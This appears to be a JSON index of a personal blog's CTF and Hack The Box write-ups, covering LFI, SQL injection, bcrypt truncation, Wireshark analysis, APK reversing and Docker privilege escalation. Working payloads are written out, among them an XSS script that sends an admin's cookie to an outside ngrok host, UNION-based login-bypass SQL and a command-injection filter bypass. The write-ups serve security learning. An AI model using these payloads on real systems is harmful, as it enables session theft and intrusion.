9 10 11 12 13 14 15 16 17 18 19 from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image() you also have to run the following command to set the exit data\n1 2 3 exiftool 
-PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\n Login This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 5 pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 6 xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34; Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . 
I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n ","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1 How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\n What is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\n Which city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\n How many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\n What is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\n What machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\n What is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\n What was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. 
The MAC address is on the blue line I have highlighted:\n What email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\n DEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\n The above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. 
Read more here\nwe can use this sql statement to get the blob\n1 2 3 select data from blobber where id=238 Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\n ninety one In this challenge you are provided with an encoded string\n1 @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2 flag{dfb88c7d9ca38e71dc27e1072fc43d1b} glasses This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 3 flag{8084e4530cf649814456f2a291eb81e9} web category starwars In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 7 \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt; the flag will be returned in base64 format. 
Use it in the browser to access /admin page and the flag\n misc category zombies In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 2 adb install jninjaspeak.apk Decompile the application using apktool\n1 2 3 4 use : apktool -r -s d jninjaspeak.apk We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\n Fortune teller For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. 
Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\n wheres waldo In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 5 mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute(); the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import requests def calculate_distance(latitude, longitude): url = 
f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move() The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 5 lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 5 Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9 final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 3 open port 22 open port 50015 a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. 
I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 2 \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for built-in operation\u0026#34; I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]} I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13 +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+ We can login to ssh as the user sau. 
The we read user.txt\n I uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 6 Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\n REFERENCES for gprc and other ways to expoit it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. 
Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\n Looking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34; As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 2 mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34; We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access 
denied and then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . 
You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}] \ No newline at end of file +[{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 2 payload: \u0026#34; or 1=1-- - since it was in json we you had to excape the first double-quote\n README This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\n Gain access 1 For this challenge we are given a login page. 
It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 2 payload : root@knightctf.com\u0026#39;-- - Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 3 I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d The hash is md5 since it has a length of 32. Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 2 payload : anything\u0026#39; or 1=1-- - We then get access to the dashboard\nI got stuck here , will update when the ctf ends. :)\n Networking For the networking challs check out my teammates writeups on them \u0026raquo;\u0026gt;\nhere ","date":"2024-01-20T22:14:59+03:00","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, 
\u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34;or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main() flag: irisctf{my_p422W0RD_1S_SQl1} ","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\n How many events were collected and Ingested in the index main? 1 2 3 index=\u0026#34;main\u0026#34; ans: 12256 On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username? 1 2 3 4 index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key? 1 2 3 4 5 index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto Examine the logs and identify the user that the adversary was trying to impersonate. 1 2 3 4 5 6 7 The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto What is the command used to add a backdoor user from a remote computer? 
1 2 3 4 5 6 index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34; How many times was the login attempt from the backdoor user observed during the investigation? 1 2 3 4 5 6 7 8 index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0 What is the name of the infected host on which suspicious Powershell commands were executed? 1 2 3 4 index=main powershell ans : James.browne PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution? 1 2 3 4 index=main EventID=\u0026#34;4103\u0026#34; ans: 79 An encoded Powershell script from the infected host initiated a web request. What is the full URL? 1 2 3 4 5 6 7 8 from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 14 1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager Wazuh agents 1 2 3 4 5 6 7 8 9 1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? 
disconnected Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4 1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196 Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9 1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer Collecting Linux Logs with Wazuh 1 2 3 4 1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 10 1. What application do we use on Linux to monitor events such as command execution? auditd 2. What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5 Generating Reports with Wazuh 1 2 3 4 5 1. Analyse the report. What is the name of the agent that has generated the most alerts? 
agent-001 ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400 I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 def downloadManual(url): safeUrl = isSafeUrl(url) if safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 10 blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True We can easily bypass this , there are many routed to localhost other that the ones listed there. 
You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 3 4 http://127.0.1.3:1337/api/addAdmin?username=test We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n ","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? d9ac0f7db4fda460ac3edeb75d75e16e Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? 
